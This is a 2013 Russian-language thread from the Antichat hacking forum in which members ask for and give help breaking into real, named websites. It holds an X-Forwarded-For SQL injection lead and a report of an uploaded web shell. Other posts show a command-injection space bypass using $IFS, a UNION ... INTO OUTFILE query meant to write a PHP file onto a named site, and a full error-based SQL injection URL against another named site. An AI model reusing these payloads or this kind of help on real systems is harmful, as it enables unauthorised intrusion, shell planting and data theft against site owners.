HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.01.2013, 14:33
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363

Репутация: 11
По умолчанию

помогите раскрутить,что то не получается

инъекция в заголовке в x-forwarded-for: 1'"

Код:
http://drive.s13.ru/?id=1
а то чё то туплю.
 
Ответить с цитированием

  #2  
Старый 20.01.2013, 22:10
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457

Репутация: -10
По умолчанию

Залил shell на форум,открыл но там такая ситуация.

http://savepic.org/2581219.png

права на загрузку есть в папку tmp мона ли как-то оттуда потом открыть shell ? спасибо.
 
Ответить с цитированием

  #3  
Старый 20.01.2013, 22:15
Vip77
Участник форума
Регистрация: 29.09.2012
Сообщений: 233
Провел на форуме:
46989

Репутация: 20
По умолчанию

Помогите плиз, есть сайт при запросе page=1;ls отображает содержимое текущей директории, а вот при запросах с пробелами на пример page=1;ls -lha ничего не отображает.
 
Ответить с цитированием

  #4  
Старый 21.01.2013, 00:48
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363

Репутация: 11
По умолчанию

Цитата:
Сообщение от Vip77  
Помогите плиз, есть сайт при запросе page=1;ls отображает содержимое текущей директории, а вот при запросах с пробелами на пример page=1;ls -lha ничего не отображает.
пробуй так

Код:
ls$IFS-la
 
Ответить с цитированием

  #5  
Старый 21.01.2013, 03:03
DonaldDuck
Участник форума
Регистрация: 29.04.2012
Сообщений: 110
Провел на форуме:
41100

Репутация: 1
По умолчанию

Запрос:

Код:
http://www.rengl.cz/ceniky/mesto.php?id=-119'+union+select+1,'',3,4,5,6,7,8,9,10 INTO OUTFILE '/srv/http/adent.cz/rengl.cz/1.php' --+
Результат (файл rengl.cz/1.php не создается):

Код:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /srv/http/adent.cz/rengl.cz/ceniky/mesto.php on line 37
Почему?
 
Ответить с цитированием

  #6  
Старый 21.01.2013, 03:51
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363

Репутация: 11
По умолчанию

в HEX переведи попробуй.

Может ещё быть что прав нет на корневую папку,ищи врайтабельную.
 
Ответить с цитированием

  #7  
Старый 21.01.2013, 09:39
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Faaax  
в HEX переведи попробуй.
Да что вы говорите ? И из hex код исполнится ? Бред !!

можно и нужно урезать до

Попробуй.
 
Ответить с цитированием

  #8  
Старый 21.01.2013, 16:02
er9j6@
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
Провел на форуме:
107835

Репутация: 23
По умолчанию

Есть скуля, раскрутить не знаю как

_http://tagilcity.ru/component/option,com_fireboard/func,fbprofile/task,showprf'/?option=com_fireboard&func=showcat&Go=%25D0%2598%2 5D0%25B4%25D1%2582%25D0%25B8&catid=171
 
Ответить с цитированием

  #9  
Старый 21.01.2013, 20:43
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от er9j6@  
Есть скуля, раскрутить не знаю как
_http://tagilcity.ru/component/option,com_fireboard/func,fbprofile/task,showprf'/?option=com_fireboard&func=showcat&Go=%25D0%2598%2 5D0%25B4%25D1%2582%25D0%25B8&catid=171
Код:
http://tagilcity.ru/index.php?option=com_fireboard'+AND+(SELECT+4662+FROM(SELECT+COUNT(*),CONCAT(0x7e414e5449434841547e,(SELECT(CASE+WHEN+(4662=4662)+THEN+version()+ELSE+0+END)),0x7e414e5449434841547e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+AND+'RGKx'='RGKx&func=fbprofile&task=showprf
Найденную Вами SQL инъекцию можно сократить, т.к. запрос один и тот же, только вот первая его часть представлена как ЧПУ, а вторам с GET параметрами, собственно реализацию которой я Вам и продемонстрировал.
 
Ответить с цитированием

  #10  
Старый 21.01.2013, 23:11
ART-inc
Новичок
Регистрация: 27.06.2011
Сообщений: 8
Провел на форуме:
2956

Репутация: 0
По умолчанию

Имеется доступ в site/mysql/scripts/setup.php. pma 2.11.11.3. Как получить доступ к бд ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.